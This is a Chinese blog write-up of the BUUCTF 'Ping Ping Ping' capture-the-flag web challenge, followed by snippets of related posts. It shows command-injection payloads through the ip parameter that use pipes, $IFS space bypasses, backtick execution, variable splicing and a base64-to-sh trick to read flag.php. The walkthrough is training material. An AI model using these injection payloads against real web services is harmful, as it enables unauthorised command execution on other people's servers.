Buuctf--pingpingping

于 2023-10-23 20:52:23 发布
阅读量118 收藏
点赞数 1
分类专栏: Buuctf 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_75120258/article/details/133998637
版权

我们先打开环境

我们看到了/?ip=  想到可能是在url中进行pingpingping

在url中输入 /?ip=127.0.0.1

看到了有回显 接着输入/?ip=127.0.0.1 | ls

提示错误,空格被过滤了,那我们就不要空格,输入/?ip=127.0.0.1|ls

显示了两个文件,flag就在flag.php中,之后我们需要使用绕过空格的方法,网上有很多,我使用了其中一个,输入/?127.0.0.1|cat$IFS$6index.php(这儿的数字6换成其他数字也行)

看到这儿,好多绕过的方法都被过滤了,剩下的我都不会。。。。网上搜索其他方法

看到他没有过滤符号`   我用的是内联执行法,就是先执行ls,再用cat把所有文件打开

构建url: /?ip=127.0.0.1;cat$IFS$6`ls`

查看源码得到flag

是小航呀~
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF之Ping Ping Ping
金 帛的博客
02-20 6672
BUUCTFWP,关于一些waf的绕过
BUUCTF【Web】Ping Ping Ping
qq_70434663的博客
03-02 770
首先使用ls命令查看当前路径下有那些文件,拼接符有“&”、“|”、“||”、“&&”、“;进入靶场后是一个ping的功能(命令执行漏洞),参数ip传递的内容会被当做ip地址进行网络连通性测试。绕过空格后发现过滤了flag(绕过flag),所以使用反引号``(高优先级特性)查看flag.php。绕过后我们并没有发现flag,那是因为注释的内容不会直接显示在页面中,右键查看源码就可以获取flag。接下来直接访问flag.php文件,直接访问PHP发现空格过滤了(绕过空格),所以我们使用$IFS$9来绕过空格。
buuctf [GXYCTF2019]Ping Ping Ping
m0_63711447的博客
05-25 1332
1、打开题目环境 2、 先ping一下试试 3、直接cat flag,提示说不能有空格 4、用%09过滤空格,可能是过滤了特殊的字符 5、
BUUctf [GXYCTF2019]Ping Ping Ping
qq_61988806的博客
10-28 1228
BUUctf [GXYCTF2019]Ping Ping Ping
Buuctf (Web)Ping Ping Ping
m0_64444909的博客
04-02 2720
文章目录一.解题步骤二、命令分隔符三.常见绕过方式 一.解题步骤 (1)页面里显示/?ip=,很明显要以ping的形式传一个参数给ip,并且我们要想执行其他命令,就要用命令分隔符也就是管道符连接,命令分隔符可以用";“”|“”&"三种,本题经过尝试发现第一步查看目录过滤了|,&和空格。 这里介绍两种方式: 1.ping本地127.0.0.1 2.用||来代替127.0.0.1; (2)虽然找到了放flag的文件,但是尝试后发现都不对,这里介绍一种思路,我们可以通过查看index.php
BUUCTF WEB INCLUDE &&Ping Ping Ping
m0_46315342的博客
08-20 783
BUUCTF WEB INCLUDE 进去之后看到的是这样的,然后点击链接, 在这里试一下php伪协议,构造URL为 http://1ec44303-73b4-47c1-b74e-764c7f147d6f.node3.buuoj.cn/?file=php://filter/convert.base64-encode/resource=flag.php 得到 拿去解压之后可以达到: <?php echo "Can you find out the flag?"; //flag{672214de-
BUUCTF [GXYCTF2019]Ping Ping Ping
m0_49025459的博客
04-30 684
题目 打开网站 就这么点东西,啥都没有,那么我们浅试一下 那我们ls一下将文件名都输出出来,我们用几种方式都可以输出文件名 ?ip=127.0.0.1|ls ?ip=127.0.0.1;ls ?ip=127.0.0.1||ls 这里都是用了Windows中的管道符命令 | 直接执行后面的语句,例如 ping 127.0.0.1|whoami ||如果前面执行的语句出错,才执行后面的语句,所以前面的语句必须为假,例如 ping 1||whoami &前面的...
buuctf-Ping Ping Ping
xixihahawuwu的博客
11-23 776
看着界面,是一道命令执行题 构造payload Ls查询下 空格被过滤了 $IFSKaTeX parse error: Expected 'EOF', got '#' at position 67: …23162235934.png#̲pic_center) Fla…IFS1Y2F0IGZsYWcucGhw∣base641Y2F0IGZsYWcucGhw|base641Y2F0IGZsYWcucGhw∣base64IFS$1-d|sh ...
buuctf:Ping Ping Ping(命令执行)
zzqzzq11的博客
08-06 1319
buuctf
BUUCTF刷题记录 Ping Ping Ping
m0_46576074的博客
05-16 1801
[GXYCTF2019]Ping Ping Ping 进入页面 然后/?ip=127.0.0.1|ls 进入 读取flag.php 再cat$IFS$1indnx.php 再变量拼接 ?ip=127.0.0.1;a=g;cat$IFS1fla1fla1flaa.php 转至 http://1d22a0a5-c6a0-43f1-8e52-e5a33ec7e044.node3.buuoj.cn/?ip=127.0.0.1;a=g;cat$IFS1fla1fla1flaa.php 再F12 ...
BUUCTF__[GXYCTF2019]Ping Ping Ping_题解
风过江南乱的博客
06-25 3057
前言 我感觉我是一个假的理科生,假的计算机相关专业学生,完全没有该有的样子 这题有点东西,不算太水。只是对我来说。 读题 题目是Ping,打开也没有内容,就一个get传参的ip变量 不过看到ip和ping就容易联想到,终端ping命令。 先尝试传入一个ip=127.0.0.1,于是乎出现了如下,在终端下执行的效果就是这样,命令执行石锤了。 命令执行可以干很多事,也就是命令行,LInux下大佬们日常操作都用命令行代替鼠标。 首先想到用什么办法?让它执行我们需要的命令。很明显变量ip是突破点。 先看传
红色龙年2024新年工作计划PPT模板
07-13
【作品名称】:红色龙年2024新年工作计划PPT模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
项目管理策划编写模板.docx
07-13
项目管理策划编写模板.docx
架子管及扣件现场管理规定.docx
07-13
架子管及扣件现场管理规定.docx
Swift语言教程&案例.docx
最新发布
07-13
Swift 是由 Apple 开发的一种现代、安全、快速的编程语言,适用于 iOS、macOS、watchOS 和 tvOS 应用程序开发。以下是一个详细的 Swift 语言教程,适合初学者逐步学习。
ctf_tools_list.md
07-13
ctf_tools_list
巴比达内网穿透.txt
07-13
巴比达内网穿透
buuctf pingpingping
10-07
buuctf pingpingping 是一个CTF比赛中的题目。题目要求通过执行命令来获取flag。根据引用提供的信息,我们知道可以使用ping命令传递参数给ip,并且可以通过使用命令分隔符来执行其他命令。但是题目中对一些常见的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值